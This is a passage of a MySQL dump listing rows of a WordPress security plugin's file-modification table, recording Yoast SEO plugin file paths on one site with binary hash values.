('Œ°a¬Às“ÁO¿–¥Ê»', 'wp-content/plugins/wordpress-seo/src/integrations/feature-flag-integration.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/feature-flag-integration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'àò‚ëxRãæ\\ÕùŸ-', '®#¶?t"£_ÕÜå	ø†I:\0\n²–´aþ[ª"¢', '', 0, '?'),
('Ñ#UéÐ¤d©å,1Ï', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/backwards-compatibility.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/backwards-compatibility.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'd“Ü³g\n€i]¸½R', '&AHoâns—?Ì¢\\}F x7g[^£’°ík¨ñÉˆ', '', 0, '?'),
('þ¬œÙ‚•‡“D…£', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/category-term-description.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/category-term-description.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥*U‡>þà¶NØTŠ', ']Ò3Þ÷:Øä?õ!F‡ã_m«4òWÚÖç»ÏŸ[', '', 0, '?'),
('óí)§U?3j;Ëjh:', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/comment-link-fixer.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/comment-link-fixer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'aJC·ï¶¡\nê)üÃ±m,', 'agFºŸ¦®“½%·Vw&Sx¶Å z÷yÞ­ÿêÓ.^]æŒ', '', 0, '?'),
('‡ íìÐt^czbK4íÙ', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-basic.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-basic.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ë-I8È'']Û\0ÂR†fê', 'kÒ‰Òr®Ô;LÊÛ iéuù9%žrUš½c£vþÍ', '', 0, '?'),
('y+…|pU×Ù"âAYÝ$Fí', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-rss.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-rss.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+W¢£Â8\Zl¬Šò(ôÞ', 'óšQt¿Zz,´é·Üb‡Kî\r©²c½É,«ú¬ ÚS', '', 0, '?'),
('(•ž·ö¨ãîõ¨¨{@', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-searches.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/crawl-cleanup-searches.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hŠÝÈbµdEV<$C‹Á›f', '}Î¸Œ4bÍ}òC³³‰†ëqoÒOx’÷ø×ÇÏd{ã', '', 0, '?'),
('¬¤"¹–Ö³ƒšÝ¸B=@ÓS', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/feed-improvements.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/feed-improvements.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7å-~áaÄ	Yù©øð ', 'wiIs+jU¸¶fÉW§£ÙmD²ò¬%<oO|ê6Ú', '', 0, '?'),
('÷CË:ÛòU8>õ¤Öh&Áh', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/force-rewrite-title.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/force-rewrite-title.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ç¸¹‡\Z¤Õ+kGÑgž|M', 'íúŒÇæ¢O·òñ´PÞnUZ7Î±ÚúLýÏð’}œ', '', 0, '?'),
('õÀ(•¹œwýÄSÂÖO', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/handle-404.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/handle-404.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ð=uVþœp¥$ç¯}~\Z', 's±&=`à`©úç´\n\n-Å¾|Òz´Ø–úTC>ÆÀ', '', 0, '?'),
('ý2å£ç©ê=EjÂ˜Ýh\n', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/indexing-controls.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/indexing-controls.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"ìåE3Æb&b‘q¥ë\0”', '1¬»8ýt;2Ó!qßÕ«3%f!zvm@ƒË˜Ä"çA', '', 0, '?'),
('ÍdyÆÉ˜3Ÿþ“Ãï', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/open-graph-oembed.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/open-graph-oembed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'v½0ØçŒÐÿR8ÅY', 'mKÉ#=P\rhCÅ‘rœˆ(0S]ÞP-E+å2³¾', '', 0, '?'),
('ÜóóîÇ–íÉÿ¶‚o', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/redirects.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/redirects.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—ˆ99¶u˜¿Kj¦w‰', 'È	åÇÿsÀødæ8-à®5€a Ï*Á|ÞDÊïi', '', 0, '?'),
('ÖrAü¤Ï]	€š/sú+Ñ', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/robots-txt-integration.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/robots-txt-integration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'y}gçá­W¹@AñÃjÿ~', '›¬¯6ì@°ôˆõ­Â\0Zýß´þ…~îö0 €c)Þâ', '', 0, '?'),
('ZŠ.zY#»û¬áOŒº`)»', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/rss-footer-embed.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/rss-footer-embed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'µM}¹ÈU¶µƒ)%¥', '4¼H\0 =€¥(/¨Œöî±øåLŠ®ï2\0âõ', '', 0, '?'),
('/''l¶ÈžC¤aÝŸ@…¥9ý', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/schema-accessibility-feature.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/schema-accessibility-feature.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'b<â¶°k¥ê`Žn-æÕþÍ', '€½á^”&‚ÑÖ»Ò#z\00Ãïµ¼=jWÑŸÛ6œE', '', 0, '?'),
('‡µ¢Y‘½¢x™ú¤Q', 'wp-content/plugins/wordpress-seo/src/integrations/front-end/wp-robots-integration.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end/wp-robots-integration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›ö/fâHyÓnsÿ‰J3''', 'ÉÜxzÔ/EÍ4ù§\ZP³sIßÇk:Õ3ÐÇñ¤]/¡', '', 0, '?'),
('¸KmãMƒø¢¼ÐoÑ‡€', 'wp-content/plugins/wordpress-seo/src/integrations/front-end-integration.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/front-end-integration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'XH—­K»Ú¨§âkHª\r!', 'ºS#ÃÝa/ç«úˆ|oƒÖÓŽÒbíþA+Í"', '', 0, '?'),
('R”²A”ÉÆH=€ÓWÃ>åa', 'wp-content/plugins/wordpress-seo/src/integrations/integration-interface.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/integration-interface.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'q‡ö0\0N†œÍD	ÝFª', '¹Slþ§fA× O¿	ìw|=EBÍëDf²­‘q', '', 0, '?'),
('º )¹!h$R§Uvx˜ÆºÞ', 'wp-content/plugins/wordpress-seo/src/integrations/primary-category.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/primary-category.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ó³é H“À„ ÌÔÛUs', '}Þš:¯M)c§ðÏ%þNBV¿Ìá!u‘…l{', '', 0, '?'),
('Ö	í§ãõ_Nidô1CL', 'wp-content/plugins/wordpress-seo/src/integrations/settings-integration.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/settings-integration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’EZ$-3\n»¢ZWf’’', 'ÉLr]1‚8ÚlL#ç{êÙ.ìÉà‹ƒ»Ìk¶Œ¨Å¬', '', 0, '?'),
('ôŠ¥•RPÊúpÛÖÝèç ', 'wp-content/plugins/wordpress-seo/src/integrations/support-integration.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/support-integration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ï¶/U­N^ÈÎ²¨+¬', ':b7ü¢> \n2Kt ¥îqÎ,ÑH2\\^"ÍmEÍŸÎ', '', 0, '?'),
('óú8ÔØU2èÿTãMeœ¡', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/amp.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/amp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ë²¨@+µÉ‘\Z~œG5 wr', 'ìöÞ\n¯_Äßw*Pzž*Z#í4³w,L·ueŸ©', '', 0, '?'),
('˜ñen''šLBvj•\r', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/bbpress.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/bbpress.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Q7$„üPvóÏöK(7m', 'Éz¹Ä)y‚þþJV‘œ±¦g{Ù±xCƒ"vFndPX', '', 0, '?'),
('‹œ|j4µÎÁ8KœH,È', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/elementor.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/elementor.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ˆf¦S½¡g–‹’Æ', '‹,\Z0ÙÙ.4\rí±„=RÜõ€­þŸ…{Ik¸–j', '', 0, '?'),
(')´;³¥ÑtVßòÌn—', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-elementor-post-types.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-elementor-post-types.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Oð"Œtÿ(2]ålª', '6ÜµÉøƒÐ&½´`sãÉ{†`ò\ZO1“µÛ,Ä‹§²', '', 0, '?'),
('dõ|–¦K<cõî:8×Q«', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-woocommerce-post-types.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/exclude-woocommerce-post-types.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'p‚R¦yé\nã¨Öâ¢', 'äàaª	öôB|[4÷ÿ¶ºŠ]Ó›Ä³ÃÉŒ)è”$[ö', '', 0, '?'),
('ÐÉÉŠŽ.p]¼È½àZ', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/jetpack.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/jetpack.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '·ÙH°œLM‹ñî]j8•Ò', '[lj=“à‡B[\n"¿±ÉuB¾u[Udæ²R>±eÎ«', '', 0, '?'),
('×v"6Ô`ÒvyïH„ªŒ¹', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/w3-total-cache.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/w3-total-cache.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'dXÔˆ¶Eý%”E‚E', ',ù›;Q×Ë]›:Å­¸ð\r{#~¼ã¯Ž±i\\$ë— ', '', 0, '?'),
('•ÄÜ<fïF1h§»¿—Â', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/web-stories-post-edit.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/web-stories-post-edit.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ìôfldNþ`GþÓr(æ%d', 't9æøv0÷£%‚ž‡+|šQq\Z¾Mžf«×YT”F', '', 0, '?'),
('õ|–*w/\ZT*º6ìÄbJ', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/web-stories.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/web-stories.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2\r©!³]Íõ,’ý‡Ž', 'rìÌþÑ”2ëXÃB}ÅS¶Šû¹®ž$ápÞÊ{fçÄGl', '', 0, '?'),
('Ó»Û¬Ì¸Zé‹a(Ë;‰š', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/wincher-publish.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/wincher-publish.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'DãõÖá.6´ ™Ì\\ý$ßF', '>A¶ †bøÅ¯qé¸ƒâËIàSUIUÇ–.Õâ}', '', 0, '?'),
('ÁRzÆÈ/_Î8¾@''“!ˆ', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce-permalinks.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce-permalinks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Tã¶l»õé×<ã˜R%Ä*I', '2BRzm9,oŠç‘‘w Î«È}iê>äQŽ+¿!\n\\', '', 0, '?'),
(' Ú`ÆFlPÑSðeX/', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce-post-edit.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce-post-edit.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '³:Z*b''\Z›~\ZëÉn*¶', 'àª à”!‚Bïxt‚ä˜ˆqÿ3vçŠ˜st<ÝÁjÀ', '', 0, '?'),
('9Es+¯\naj)€ÏÒ', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÎXG¯õ\nÄˆä‡¬HBÒÞ', ',fÎûÉWüf‡úüöüþÐëÄÑ¬“Còü?¡„Ç<y,P', '', 0, '?'),
('NÚ¡t¼J?gwÀ', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/wordproof.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/wordproof.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'À£Äñ	Lëôäf;Ê²', '3¬ZklµŽ;RÞº¤Þí‘/.o\0«:¢‡±­Î¶[', '', 0, '?'),
('ø«6+ùÙ%ÕÉº ´', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml-wpseo-notification.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml-wpseo-notification.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'œõ\0 ãgµg\rV¹Ppû', 'Ô†Ê¢mYž@8žo\r`Í1ØV1Œ„úÐ4Á‚­ÅÚõe', '', 0, '?'),
('5»Çzb@dAÁc>Œ†A–', 'wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’º[ä©ØÉiýÂádö_‚', '@Ž™¨šJ	¥HªîÊï%8FFä³™HWˆ4nU%j', '', 0, '?'),
('N\n»‰ÛsžÐäŸ}£', 'wp-content/plugins/wordpress-seo/src/integrations/uninstall-integration.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/uninstall-integration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'r«€ÐRÊò\ZºmG¢''', 'Ú~•nr<RÌü3û>Þ=`ÇÔÌ«•Þ¿àïƒ©Wô', '', 0, '?'),
('J0Näƒíêþq''àtžo#', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/addon-update-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/addon-update-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'z\nyîbQìúEôÒU\r!', 'xXN7÷ ÿ{‚Ée=ÈW›Ú8^—ï‘\\F%)°Ã=nŽ', '', 0, '?'),
('$êGEðkÆ<[½Œü›', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/auto-update-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/auto-update-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0*ÏÓûÒ0–-”zc<z¨', 'à•^øã$A\n#ªš7ÅTú‹¶ZP®äó-£€âM', '', 0, '?'),
('ík.ŒOjMÇSƒåÃŸ', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-ancestor-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-ancestor-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '0ñ§öìs³÷\nNº–Ùq¯', 'I[‚4ÔlzÏ„1ÅŒ†Òøì²®Ì™¤üÝ‰K', '', 0, '?'),
('ÒªžkøÏ}¢¢ƒE', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-attachment-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-attachment-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„WGfRååô6]æ?)/Š', 'î.ÿ”Òà.XQ¨|acz%ôœCüB-.NlKR¡', '', 0, '?'),
('xº™\0ûŸê¨°ÊÆS+6]', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-archive-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-archive-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '>bá&Ë''_}qù¤(4—', '8Lþ=ûXm’L¡b÷ê{ø‡ý(•T¡à¿=ë4', '', 0, '?'),
('<\0$›Ðœ?ùðƒ-8U\0', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'v Æûò3%–ÌSŸ™kCP', '6e¨F$@;4÷¡’ò®m‰¿Ë¦JzÕçÌ‘', '', 0, '?'),
('†’òy0só£ó­è‡?', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-category-permalink-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-category-permalink-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ë¡‚[á³Îà–³ˆ›8Ú', 'mÑo¿ón&z¬œ×é!àÐC`B¾›†e8RA`˜¢Þ', '', 0, '?'),
('³‚èl’‹‡¦`b=Ÿ´ç', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-date-archive-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-date-archive-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '|¤Tâï3Ô6q[|Ì¸', '\\Ó¾WºõZ…žâ+r0U­™kÑÝª@eû9t§', '', 0, '?'),
('w5ÿn3$ ˜òLZº2`7', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-home-page-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-home-page-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ùø5Ùå®¥òf…K†à<', '@p<XÛ„à(ÀêÕ7ÆÙ‘CòúØ\n|„[“ÛZÌ', '', 0, '?'),
('Ü²IÁ: ¶åoÐª÷"ò', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-homeurl-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-homeurl-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6´½qHºjzè»`†', '#p}Î‘ò£¼ÊZøcÖ•nM.Ñÿ9Ó\r¥ýÆ.2ìm', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('#tÂn2¨ïØÒ=Ï^V', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-permalink-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-permalink-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '4xñ%œ\r\Z EØþêª¹', '“]¬àÍÌf›&àµtî–WHokcEÐß}–éð:ŒK', '', 0, '?'),
('+Þ¦kUX‘²¨E¦±‚›h', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-meta-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-meta-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ß—ú%ŸQè¹,uƒ*\Zè²H', '€Z¹"9è2AaìÞÑT—ÛŽ’K5X‘¯#žý:Q', '', 0, '?'),
('îÄÈ_eém>ˆùù1¶V›Œ', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-archive-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-archive-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Z~¸ó:øzãÇ§“ê#øÊ', 'Óë\ZÓ^^ámPÝ™ÐQN6ÜX;­¶á/Á‡jºVÂ5', '', 0, '?'),
('ß~>g‡õ>j^0%a®sg', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-change-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-change-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ß\nÕ*¤±g¹R7ôƒŒ', 'ÎãØ—Œë,!©=;\rd|ŸÊyÓÀÉ=7¾Wût¸''''', '', 0, '?'),
('þ¤‰„KJVÃYî[]', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÊŸ\röÐ^ýýÎ"ã', 'KQ¼4)A…áá‰…„üâô$."\roö¸>v7•‡@', '', 0, '?'),
('»_)BIRâXo0Öµlè', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-static-home-page-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-static-home-page-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'VÙ=KV™v²îÒ~ÒËˆ8', '&‚þB½DQPÔCâön‚Á^ÃØu½ÏÂvÝ&ÕáÊ', '', 0, '?'),
('IêŽm=!‡.šÏÂðÊ', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-system-page-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-system-page-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'é6Ã£Ux€qk=Êžzá', '''a\\€Êôp{”Yè1½I\r×ºÔ”ƒ€eY$o]hÑb', '', 0, '?'),
('	(©ƒ—;†;L|×½=´ª', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-taxonomy-change-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-taxonomy-change-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6×ÿ/ìnÆÛ¹ù‡ˆ³Cê', '+G‘ªÐ¦þ¶c[½¥äÃ—™("e\0@àNX@„1a', '', 0, '?'),
('Sõ\\8z;«X¥ë8èü¬', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-term-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-term-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{ucV.ÚàFdº®›ƒ¯“', '¸°~!yZ!“Þ¤/ýê>Bõ2o·Àx„ÚwwY', '', 0, '?'),
('š"¿ŒéÇ‰Í˜°FÊ;,', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/option-titles-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/option-titles-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'çö€‹0•Ä¦oF‚Ç', 'ˆe™:©‘U›•B“Ušt£7_ìèÖFb/TÎvoV', '', 0, '?'),
(' «¡$1p<”‰ô‹°6ý', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/option-wpseo-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/option-wpseo-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õx·OÎ…z`].Aª‚', 'ÆŽ ƒwQâœ#n}÷”ž(´‹5l™H/\Z³,Hï5Ä[', '', 0, '?'),
('qc»‰_³àÒÒ²Û¯Š+', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-category-quick-edit-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-category-quick-edit-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'v$þ*:$:aB/Ö9:X', '¿íÚD™.pDcw†.Aì¬Wç9:"] WšÛ­', '', 0, '?'),
('}ã¶/NÒör%ƒ]t¥œ', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-term-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-term-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'æ”Î÷]@ïª~í‘qð', 'ß¥©ÚÅS/3\nf†½	Fø=.ž6ü!ãìe', '', 0, '?'),
('G¬’;\0Ý¢*égª§\\Ðß', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/search-engines-discouraged-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/search-engines-discouraged-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'öcË©_Ó\rÄÁUqg¦', '4`õZ`à¿.QtP2Û%YÎ\0˜ÌGeÀ!Pô;¨`', '', 0, '?'),
('c§TÓ6pËë…}OV>˜¦À', 'wp-content/plugins/wordpress-seo/src/integrations/watchers/woocommerce-beta-editor-watcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/watchers/woocommerce-beta-editor-watcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '€ó¡¡µîvfƒ°@zÙ)º', 'ÛøÇpi¾"ˆªYz=À=…Ã¹ê''Ô U', '', 0, '?'),
